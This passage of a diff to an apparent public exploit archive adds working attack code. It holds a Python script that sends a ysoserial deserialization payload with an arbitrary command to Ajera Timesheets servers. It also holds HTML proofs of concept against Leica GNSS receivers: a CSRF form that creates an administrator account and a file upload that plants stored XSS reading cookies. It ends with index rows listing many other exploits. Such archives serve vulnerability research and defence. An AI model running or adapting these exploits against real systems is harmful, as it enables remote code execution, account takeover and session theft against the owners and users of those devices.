for line in iter(p.stdout.readline, b''):
output += line
return output
def isurl(urlstr):
try:
urlparse.urlparse(urlstr)
return urlstr
except:
raise argparse.ArgumentTypeError("invalid url")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Ajera .NET Remoting Exlpoit')
parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.")
parser.add_argument("--cmd", "-c", required=True, help="the command to execute")
parser.add_argument("--auth", "-a", required=True, help="the ASPXAUTH cookie")
parser.add_argument("--version", "-v", required=False, help="the version of Ajera Server. 8.9.9.0 => 8990", default="8990")
parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.exe")
parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080")
args = parser.parse_args()
url_parts = urlparse.urlparse(args.url)
target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc)
proxies = {}
if(args.proxy != None):
proxy_parts = urlparse.urlparse(args.proxy)
proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc)
cmd = "/c " + args.cmd
size = len(cmd)
serial_payload = run_command('%s -o raw -g TypeConfuseDelegate -f BinaryFormatter -c "%s"' % (args.ysoserial, args.cmd))
url = target_url + "/ajera/Secure/SAService.rem"
headers = {'Content-Type': 'application/octet-stream'}
cookies = {'.ASPXAUTH': args.auth}
payload = "\x04" + args.version + zlib.compress(serial_payload)
response = requests.post(url, headers=headers, cookies=cookies, data=payload, proxies=proxies, verify=False)

58
exploits/windows/webapps/46090.html Normal file
View file

@ -0,0 +1,58 @@
<--
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 Cross-Site Request Forgery
Vendor: Leica Geosystems AG
Product web page: https://www.leica-geosystems.com
Affected version: 4.30.063
4.20.232
4.11.606
3.22.1818
3.10.1633
2.62.782
1.00.395
Summary: The Leica GR10 is the next generation GNSS reference station receiver
that combines the latest state-of-the-art technologies with a streamlined
'plug and play' workflow. Designed for a wide variety of GNSS reference station
applications, the Leica GR10 offers new levels of simplicity, reliability and
performance.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: BarracudaServer.com (WindowsCE)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5502
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php
18.12.2018
-->
<html>
<body>
<form action="http://192.168.1.17/config/config_UserManagementPostBackHelper.lsp" method="POST">
<input type="hidden" name="txtHelpPage" value="config_changeuser" />
<input type="hidden" name="txtUsername" value="testingus" />
<input type="hidden" name="txtPassword" value="12345678" />
<input type="hidden" name="txtConfirmPassword" value="12345678" />
<input type="hidden" name="webRole" value="3" />
<input type="hidden" name="ftpRole" value="2" />
<input type="hidden" name="TxtOperationMode" value="2" />
<input type="hidden" name="txtEditedUser" value="" />
<input type="hidden" name="userId" value="nil" />
<input type="submit" value="Init" />
</form>
</body>
</html>

83
exploits/windows/webapps/46091.html Normal file
View file

@ -0,0 +1,83 @@
<--
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection
Vendor: Leica Geosystems AG
Product web page: https://www.leica-geosystems.com
Affected version: 4.30.063
4.20.232
4.11.606
3.22.1818
3.10.1633
2.62.782
1.00.395
Summary: The Leica GR10 is the next generation GNSS reference station receiver
that combines the latest state-of-the-art technologies with a streamlined
'plug and play' workflow. Designed for a wide variety of GNSS reference station
applications, the Leica GR10 offers new levels of simplicity, reliability and
performance.
Desc: The application suffers from a stored XSS vulnerability. The issue is
triggered via unrestricted file upload while restoring a config file allowing
the attacker to upload an html or javascript file that will be stored in
/settings/poc.html. This can be exploited to execute arbitrary HTML or JS
code in a user's browser session in context of an affected site.
Tested on: BarracudaServer.com (WindowsCE)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5503
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5503.php
Ref: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php
18.12.2018
-->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.1.17\/upload_config\/", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryKW8wlraBygxiEQyo");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryKW8wlraBygxiEQyo\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"xss.html\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\n" +
"\x3chtml\x3e\r\n" +
"\x3chead\x3e\r\n" +
"\x3ctitle\x3eHTMLi\x3c/title\x3e\r\n" +
"\x3c/head\x3e\r\n" +
"\x3cbody\x3e\r\n" +
"\x3cscript\x3econfirm(document.cookie)\x3c/script\x3e\r\n" +
"\x3c/body\x3e\r\n" +
"\x3c/html\x3e\n" +
"\n" +
"\r\n" +
"------WebKitFormBoundaryKW8wlraBygxiEQyo--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Init" onclick="submitRequest();" />
</form>
</body>
</html>

19
files_exploits.csv
View file

@ -6234,6 +6234,10 @@ id,file,description,date,author,type,platform,port
46064,exploits/windows_x86-64/dos/46064.py,"NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64,
46071,exploits/multiple/dos/46071.html,"WebKit JSC - 'AbstractValue::set' Use-After-Free",2019-01-02,"Google Security Research",dos,multiple,
46072,exploits/multiple/dos/46072.js,"WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write",2019-01-02,"Google Security Research",dos,multiple,
46078,exploits/windows/dos/46078.html,"Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference",2019-01-07,"Bogdan Kurinnoy",dos,windows,
46087,exploits/windows/dos/46087.py,"BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
46088,exploits/windows/dos/46088.py,"SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
46089,exploits/windows/dos/46089.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10184,6 +10188,7 @@ id,file,description,date,author,type,platform,port
46056,exploits/windows_x86/local/46056.py,"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46058,exploits/windows_x86/local/46058.py,"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46059,exploits/windows_x86/local/46059.py,"Iperius Backup 5.8.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46093,exploits/windows/local/46093.txt,"KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation",2019-01-07,"Hashim Jawad",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17051,6 +17056,7 @@ id,file,description,date,author,type,platform,port
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux,
46075,exploits/python/remote/46075.rb,"Mailcleaner - Authenticated Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40558,3 +40564,16 @@ id,file,description,date,author,type,platform,port
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80
46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,80
46065,exploits/php/webapps/46065.py,"Vtiger CRM 7.1.0 - Remote Code Execution",2019-01-02,AkkuS,webapps,php,
46076,exploits/php/webapps/46076.txt,"Embed Video Scripts - Persistent Cross-Site Scripting",2019-01-07,"Deyaa Muhammad",webapps,php,80
46077,exploits/php/webapps/46077.txt,"All in One Video Downloader 1.2 - Authenticated SQL Injection",2019-01-07,"Deyaa Muhammad",webapps,php,80
46079,exploits/php/webapps/46079.txt,"LayerBB 1.1.1 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80
46080,exploits/php/webapps/46080.txt,"MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80
46081,exploits/cgi/webapps/46081.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting",2019-01-07,"Kumar Saurav",webapps,cgi,80
46082,exploits/php/webapps/46082.txt,"phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting",2019-01-07,"Ozer Goker",webapps,php,80
46083,exploits/php/webapps/46083.txt,"Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation",2019-01-07,"Noman Riffat",webapps,php,80
46084,exploits/php/webapps/46084.txt,"MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection",2019-01-07,"Mehmet Onder",webapps,php,80
46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80
46086,exploits/windows/webapps/46086.txt,"Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data",2019-01-07,"Anthony Cole",webapps,windows,
46090,exploits/windows/webapps/46090.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery",2019-01-07,LiquidWorm,webapps,windows,80
46091,exploits/windows/webapps/46091.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection",2019-01-07,LiquidWorm,webapps,windows,
46092,exploits/hardware/webapps/46092.py,"Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)",2019-01-07,"Nathu Nandwani",webapps,hardware,

Can't render this file because it is too large.